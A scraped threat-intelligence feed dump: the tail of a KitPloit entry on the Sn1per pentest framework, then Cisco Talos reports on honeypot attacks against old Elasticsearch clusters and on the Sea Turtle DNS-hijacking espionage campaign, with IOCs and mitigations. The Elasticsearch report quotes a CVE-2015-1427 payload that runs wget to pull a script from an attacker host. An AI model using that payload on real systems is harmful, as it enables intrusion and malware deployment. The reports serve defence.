/pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-03-01T16:16:02", "bulletinFamily": "blog", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "modified": "2019-03-01T15:56:50", "published": "2019-02-26T10:56:00", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-24T16:19:06", "bulletinFamily": "blog", "description": "[](<https://3.bp.blogspot.com/-ksOHISXuYNU/XLX7wzGSHNI/AAAAAAAAAgI/Ffst6mMQLNIBQP1F1gRMNCYEu2-jdZr6ACEwYBhgL/s1600/image2.jpg>)\n\n \n \n_Authors: [Danny Adamitis](<https://twitter.com/dadamitis>), [David Maynor](<https://twitter.com/Dave_Maynor>), [Warren Mercer](<https://twitter.com/SecurityBeard>), [Matthew Olney ](<https://twitter.com/kpyke>)and [Paul Rascagneres](<https://twitter.com/r00tbsd>)._ \n_ \n_ \n_Update 4/18: _A correction has been made to our research based on feedback from Packet Clearing House, we thank them for their assistance \n \n\n\n## Preface\n\nThis blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system. \n \n \n\n\n## Executive Summary\n\nCisco Talos has discovered a new cyber threat campaign that we are calling \"Sea Turtle,\" which is targeting public and private entities, including national security organizations, located primarily in the Middle East and North Africa. The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019. Our investigation revealed that at least 40 different organizations across 13 different countries were compromised during this campaign. We assess with high confidence that this activity is being carried out by an advanced, state-sponsored actor that seeks to obtain persistent access to sensitive networks and systems. \n \nThe actors behind this campaign have focused on using DNS hijacking as a mechanism for achieving their ultimate objectives. DNS hijacking occurs when the actor can illicitly modify DNS name records to point users to actor-controlled servers. The Department of Homeland Security (DHS) issued an [alert](<https://www.us-cert.gov/ncas/alerts/AA19-024A>) about this activity on Jan. 24 2019, warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names. \n \nIn the Sea Turtle campaign, Talos was able to identify two distinct groups of victims. The first group, we identify as primary victims, includes national security organizations, ministries of foreign affairs, and prominent energy organizations. The threat actor targeted third-party entities that provide services to these primary entities to obtain access. Targets that fall into the secondary victim category include numerous DNS registrars, telecommunication companies, and internet service providers. One of the most notable aspects of this campaign was how they were able to perform DNS hijacking of their primary victims by first targeting these third-party entities. \n \nWe assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage, which we [reported](<https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html>) on in November 2018. The Sea Turtle campaign almost certainly poses a more severe threat than DNSpionage given the actor's methodology in targeting various DNS registrars and registries. The level of access we presume necessary to engage in DNS hijacking successfully indicates an ongoing, high degree of threat to organizations in the targeted regions. Due to the effectiveness of this approach, we encourage all organizations, globally, to ensure they have taken steps to minimize the possibility of malicious actors duplicating this attack methodology. \n \nThe threat actors behind the Sea Turtle campaign show clear signs of being highly capable and brazen in their endeavors. The actors are responsible for the first [publicly confirmed](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) case against an organizations that manages a root server zone, highlighting the attacker's sophistication. Notably, the threat actors have continued their attacks despite public reports documenting various aspects of their activity, suggesting they are unusually brazen and may be difficult to deter going forward. In most cases, threat actors typically stop or slow down their activities once their campaigns are publicly revealed. \n \nThis post provides the technical findings you would typically see in a Talos blog. We will also offer some commentary on the threat actor's tradecraft, including possible explanations about the actor's attack methodology and thought process. Finally, we will share the IOCs that we have observed thus far, although we are confident there are more that we have not seen. \n \n\n\n### Background on Domain Name Services and records management\n\nThe threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space. This section provides a brief overview of where DNS records are managed and how they are accessed to help readers better understand how these events unfolded. \n \nThe first and most direct way to access an organization's DNS records is through the registrar with the registrant's credentials. These credentials are used to login to the DNS provider from the client-side, which is a registrar. If an attacker was able to compromise an organization's network administrator credentials, the attacker would be able to change that particular organization's DNS records at will. \n \nThe second way to access DNS records is through a DNS registrar, sometimes called registrar operators. A registrar sells domain names to the public and manages DNS records on behalf of the registrant through the domain registry. Records in the domain registry are accessed through the registry application using the Extensible Provisioning Protocol (EPP). EPP was detailed in the [request for comment (RFC) 5730](<https://tools.ietf.org/html/rfc5730>) as \"a means of interaction between a registrar's applications and registry applications.\" If the attackers were able to obtain one of these EPP keys, they would be able to modify any DNS records that were managed by that particular registrar. \n \nThe third approach to gain access to DNS records is through one of the registries. These registries manage any known TLD, such as entire country code top-level domains (ccTLDs) and generic top-level domains (gTLDs). For example, Verisign manages all entities associated with the top-level domain (TLD) \".com.\" All the different registry information then converges into one of [12 different](<https://www.iana.org/domains/root/servers>) organization that manage different parts of the domain registry root. The domain registry root is stored on 13 \"named authorities in the delegation data for the root zone,\" according to [ICANN](<https://www.icann.org/news/blog/there-are-not-13-root-servers>). \n \nFinally, actors could target root zone servers to modify the records directly. It is important to note that there is no evidence during this campaign (or any other we are aware of) that the root zone servers were attacked or compromised. We highlight this as a potential avenue that attackers would consider. The root DNS servers issued a [joint statement](<https://root-servers.org/news/20190314-Rootops_statement_Integrity_of_root_server_system.pdf>) that stated, \"There are no signs of lost integrity or compromise of the content of the root [server] zone\u2026There are no signs of clients having received unexpected responses from root servers.\" \n\n\n### Assessed Sea Turtle DNS hijacking methodology\n\nIt is important to remember that the DNS hijacking is merely a means for the attackers to achieve their primary objective. Based on observed behaviors, we believe the actor ultimately intended to steal credentials to gain access to networks and systems of interest. To achieve their goals, the actors behind Sea Turtle: \n\n\n 1. Established a means to control the DNS records of the target.\n 2. Modified DNS records to point legitimate users of the target to actor-controlled servers.\n 3. Captured legitimate user credentials when users interacted with these actor-controlled servers.\nThe diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals. \n \n\n\n### Redirection Attack Methodology Diagram\n\n[](<http://2.bp.blogspot.com/-FQg4Ak28yDc/XLdL-8NlekI/AAAAAAAAAXw/wDpJRiXAEGEzPJo9bQ9PxqOG8rcGn6gWACK4BGAYYCw/s1600/DNSpionage-methodology-v2.png>)\n\n \n\n\n### Operational tradecraft\n\n#### Initial access\n\nThe threat actors behind the Sea Turtle campaign gained initial access either by exploiting known vulnerabilities or by sending spear-phishing emails. Talos believes that the threat actors have exploited multiple known CVEs to either gain initial access or to move laterally within an affected organization. Based on our research, we know the actor utilizes the following known exploits: \n\n\n * [CVE-2009-1151](<https://nvd.nist.gov/vuln/detail/CVE-2009-1151>): PHP code injection vulnerability affecting phpMyAdmin\n * [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>): RCE affecting GNU bash system, specifically the SMTP (this was part of the [Shellshock](<https://www.us-cert.gov/ncas/alerts/TA14-268A>) CVEs)\n * [CVE-2017-3881](<https://nvd.nist.gov/vuln/detail/CVE-2017-3881>): RCE by unauthenticated user with elevated privileges Cisco switches\n * [CVE-2017-6736](<https://nvd.nist.gov/vuln/detail/CVE-2017-6736>): Remote Code Exploit (RCE) for Cisco integrated Service Router 2811\n * [CVE-2017-12617](<https://nvd.nist.gov/vuln/detail/CVE-2017-12617>): RCE affecting Apache web servers running Tomcat\n * [CVE-2018-0296](<https://nvd.nist.gov/vuln/detail/CVE-2018-0296>): Directory traversal allowing unauthorized access to Cisco Adaptive Security Appliances (ASAs) and firewalls\n * [CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>): RCE for Website built with Drupal, aka \"Drupalgeddon\"\nAs of early 2019, the only evidence of the spear-phishing threat vector came from a compromised organization's public disclosure. On January 4, Packet Clearing House, which is not an Internet exchange point but rather is an NGO which provides support to Internet exchange points and the core of the domain name system, provided confirmation of this aspect of the actors\u2019 tactics when it publicly revealed its internal DNS had been briefly hijacked as a consequence of the compromise at its domain registrar. \n \nAs with any initial access involving a sophisticated actor, we believe this list of CVEs to be incomplete. The actor in question can leverage known vulnerabilities as they encounter a new threat surface. This list only represents the observed behavior of the actor, not their complete capabilities. \n\n\n### Globalized DNS hijacking activity as an infection vector\n\nDuring a typical incident, the actor would modify the NS records for the targeted organization, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries. The amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days. This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world. [Other cybersecurity firms](<https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/>) previously reported some aspects of this activity. Once the actor-controlled name server was queried for the targeted domain, it would respond with a falsified \"A\" record that would provide the IP address of the actor-controlled MitM node instead of the IP address of the legitimate service. In some instances, the threat actors modified the time-to-live (TTL) value to one second. This was likely done to minimize the risk of any records remaining in the DNS cache of the victim machine. \n \nDuring 2019, we observe the following name servers being used in support of the Sea Turtle campaign: \n \n\n\n \n\n\n \n\n\nDomain\n\n| \n\nActive Timeframe \n \n---|--- \n \nns1[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns2[.]intersecdns[.]com\n\n| \n\nMarch - April 2019 \n \nns1[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \nns2[.]lcjcomputing[.]com\n\n| \n\nJanuary 2019 \n \n \n\n\n \n\n\n### Credential harvesting: Man-in-the-middle servers\n\nOnce the threat actors accessed a domain's DNS records, the next step was to set up a man-in-the-middle (MitM) framework on an actor-controlled server. \n \nThe next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials. Once these credentials were captured, the user would then be passed to the legitimate service. to evade detection, the actors performed \"certificate impersonation,\" a technique in which the attacker obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization. For example, if a DigiCert certificate protected a website, the threat actors would obtain a certificate for the same domain but from another provider, such as Let's Encrypt or Comodo. This tactic would make detecting the MitM attack more difficult, as a user's web browser would still display the expected \"SSL padlock\" in the URL bar. \n \nWhen the victim entered their password into the attacker's spoofed webpage, the actor would capture these credentials for future use. The only indication a victim received was a brief lag between when the user entered their information and when they obtained access to the service. This would also leave almost no evidence for network defenders to discover, as legitimate network credentials were used to access the accounts. \n \nIn addition to the MitM server IP addresses published in previous reports, Talos identified 16 additional servers leveraged by the actor during the observed attacks. The complete list of known malicious IP addresses are in the Indicators of Compromise (IOC) section below. \n\n\n### Credential harvesting with compromised SSL certificates\n\nOnce the threat actors appeared to have access to the network, they stole the organization's SSL certificate. The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials. This allowed the actors to expand their access into the targeted organization's network. The stolen certificates were typically only used for less than one day, likely as an operational security measure. Using stolen certificates for an extended period would increase the likelihood of detection. In some cases, the victims were redirected to these actor-controlled servers displaying the stolen certificate. \n \nOne notable aspect of the campaign was the actors' ability to impersonate VPN applications, such as Cisco Adaptive Security Appliance (ASA) products, to perform MitM attacks. At this time, we do not believe that the attackers found a new ASA exploit. Rather, they likely abused the trust relationship associated with the ASA's SSL certificate to harvest VPN credentials to gain remote access to the victim's network. This MitM capability would allow the threat actors to harvest additional VPN credentials. \n \nAs an example, DNS records indicate that a targeted domain resolved to an actor-controlled MitM server. The following day, Talos identified an SSL certificate with the subject common name of \"ASA Temporary Self Signed Certificate\" associated with the aforementioned IP address. This certificate was observed on both the actor-controlled IP address and on an IP address correlated with the victim organization. \n \nIn another case, the attackers were able to compromise NetNod, a non-profit, independent internet infrastructure organization based in Sweden. NetNod acknowledged the compromise in a [public statement](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) on February 5, 2019. Using this access, the threat actors were able to manipulate the DNS records for sa1[.]dnsnode[.]net. This redirection allowed the attackers to harvest credentials of administrators who manage domains with the TLD of Saudi Arabia (.sa). It is likely that there are additional Saudi Arabia-based victims from this attack. \n \nIn one of the more recent campaigns on March 27, 2019, the threat actors targeted the Sweden-based consulting firm Cafax. On Cafax's [public webpage](<http://www.cafax.se/Home.html>), the company states that one of their consultants actively manages the i[.]root-server[.]net zone. NetNod managed this particular DNS server zone. We assess with high confidence that this organization was targeted in an attempt to re-establish access to the NetNod network, which was previously compromised by this threat actor. \n\n\n### Primary and secondary victims\n\n[](<https://4.bp.blogspot.com/-NQC457__bD8/XLX7w7QGGOI/AAAAAAAAAgA/3nx4TTK6U1oHms5gRhGQRaw6TGmTo1H-ACEwYBhgL/s1600/image1.jpg>)\n\n \n \nWe identified 40 different organizations that have been targeted during this campaign. The victim organizations appear to be broadly grouped into two different categories. The first group of victims, which we refer to as primary victims, were almost entirely located in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Ministries of foreign affairs\n * Military organizations\n * Intelligence agencies\n * Prominent energy organizations\nThe second cluster of victim organizations were likely compromised to help enable access to these primary targets. These organizations were located around the world; however, they were mostly concentrated in the Middle East and North Africa. Some examples of organizations that were compromised include: \n\n\n * Telecommunications organizations\n * Internet service providers\n * Information technology firms\n * Registrars\n * One registry\n \nNotably, the threat actors were able to gain access to registrars that manage ccTLDs for Amnic, which is listed as the technical contact on [IANA](<https://www.iana.org/domains/root/db/am.html>) for the ccTLD .am. Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs. \n\n\n### How is this tradecraft different?\n\nThe threat actors behind the Sea Turtle campaign have proven to be highly capable, as they have been able to perform operations for over two years and have been undeterred by public reports documenting various aspects of their activity. This cyber threat campaign represents the first known case of a domain name registry organization that was compromised for cyber espionage operations. \n \nIn order to distinguish this activity from the previous reporting on other attackers, such as those affiliated with DNSpionage, below is a list of traits that are unique to the threat actors behind the Sea Turtle campaign: \n\n\n * These actors perform DNS hijacking through the use of actor-controlled name servers.\n * These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars, including those that manage ccTLDs.\n * These actors use Let's Encrypts, Comodo, Sectigo, and self-signed certificates in their MitM servers to gain the initial round of credentials.\n * Once they have access to the network, they steal the organization's legitimate SSL certificate and use it on actor-controlled servers.\n\n### Why was it so successful?\n\nWe believe that the Sea Turtle campaign continues to be highly successful for several reasons. First, the actors employ a unique approach to gain access to the targeted networks. Most traditional security products such as IDS and IPS systems are not designed to monitor and log DNS requests. The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought. Had more ccTLDs implemented security features such as registrar locks, attackers would be unable to redirect the targeted domains. \n \nThe threat actors also used an interesting techniques called certificate impersonation. This technique was successful in part because the SSL certificates were created to provide confidentiality, not integrity. The attackers stole organizations' SSL certificates associated with security appliances such as ASA to obtain VPN credentials, allowing the actors to gain access to the targeted network. \n \nThe threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials. \n \nWe will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed. \n \n\n\n### Mitigation strategy\n\nIn order to best protect against this type of attack, we compiled a list of potential actions. Talos suggests using a registry lock service, which will require an out-of-band message before any changes can occur to an organization's DNS record. If your registrar does not offer a registry lock service, we recommend implementing multi-factor authentication, such as [DUO](<https://www.cisco.com/c/en/us/products/security/adaptive-multi-factor-authentication.html>), to access your organization's DNS records. If you suspect you were targeted by this type of activity intrusion, we recommend instituting a network-wide password reset, preferably from a computer on a trusted network. Lastly, we recommend applying patches, especially on internet-facing machines. Network administrators can monitor passive DNS record on their domains, to check for abnormalities. \n \n\n\n### Coverage\n\nCVE-2009-1151: PHP code injection vulnerability affecting phpMyAdmin \nSID: [2281](<https://snort.org/rule_docs/1-2281>) \n \nCVE-2014-6271: RCE affecting GNU bash system, specific the SMTP (this was part of the Shellshock CVEs) \nSID: [31975](<https://snort.org/rule_docs/1-31975>) \\- [31978](<https://snort.org/rule_docs/1-31978>), [31985](<https://snort.org/rule_docs/1-31985>), [32038](<https://snort.org/rule_docs/1-32038>), [32039](<https://snort.org/rule_docs/1-32039>), [32041](<https://snort.org/rule_docs/1-32041>) \\- [32043](<https://snort.org/rule_docs/1-32043>), [32069](<https://snort.org/rule_docs/1-32069>), [32335](<https://snort.org/rule_docs/1-32335>), [32336](<https://snort.org/rule_docs/1-32336>) \n \nCVE-2017-3881: RCE for Cisco switches \nSID: [41909](<https://snort.org/rule_docs/1-41909>) \\- [41910](<https://snort.org/rule_docs/1-41910>) \n \nCVE-2017-6736: Remote Code Exploit (RCE) for Cisco integrated Service Router 2811 \nSID: [43424](<https://snort.org/rule_docs/3-43424>) \\- [43432](<https://snort.org/rule_docs/3-43432>) \n \nCVE-2017-12617: RCE affecting Apache web servers running Tomcat \nSID: [44531](<https://snort.org/rule_docs/1-44531>) \n \nCVE-2018-0296: Directory traversal to gain unauthorized access to Cisco Adaptive Security Appliances (ASAs) and Firewalls \nSID: 46897 \n \nCVE-2018-7600: RCE for Website built with Drupal aka \"Drupalgeddon\" \nSID: [46316](<https://snort.org/rule_docs/1-46316>) \n\n\n### Indicators of Compromise\n\nThe threat actors utilized leased IP addresses from organizations that offer virtual private server (VPS) services. These VPS providers have since resold many of these IP addresses to various benign customers. To help network defenders, we have included the IP address, as well as the month(s) that the IP address was associated with the threat actor. \n \n** \n** \n\n\n**IP address**\n\n| \n\n**Month**\n\n| \n\n**Year**\n\n| \n\n**Country of targets** \n \n---|---|---|--- \n \n199.247.3.191\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, Iraq \n \n37.139.11.155\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania, UAE \n \n185.15.247.140\n\n| \n\nJanuary\n\n| \n\n2018\n\n| \n\nAlbania \n \n206.221.184.133\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n188.166.119.57\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nEgypt \n \n185.42.137.89\n\n| \n\nNovember\n\n| \n\n2018\n\n| \n\nAlbania \n \n82.196.8.43\n\n| \n\nOctober\n\n| \n\n2018\n\n| \n\nIraq \n \n159.89.101.204\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nTurkey, Sweden, Syria, Armenia, US \n \n146.185.145.202\n\n| \n\nMarch\n\n| \n\n2018\n\n| \n\nArmenia \n \n178.62.218.244\n\n| \n\nDecember - January\n\n| \n\n2018-2019\n\n| \n\nUAE, Cyprus \n \n139.162.144.139\n\n| \n\nDecember \n\n| \n\n2018\n\n| \n\nJordan \n \n142.54.179.69\n\n| \n\nJanuary - February \n\n| \n\n2017\n\n| \n\nJordan \n \n193.37.213.61\n\n| \n\nDecember\n\n| \n\n2018\n\n| \n\nCyprus \n \n108.61.123.149\n\n| \n\nFebruary\n\n| \n\n2019\n\n| \n\nCyprus \n \n212.32.235.160\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n198.211.120.186\n\n| \n\nSeptember\n\n| \n\n2018\n\n| \n\nIraq \n \n146.185.143.158\n\n| \n\nSeptember\n\n| \n\n2018\n\n| 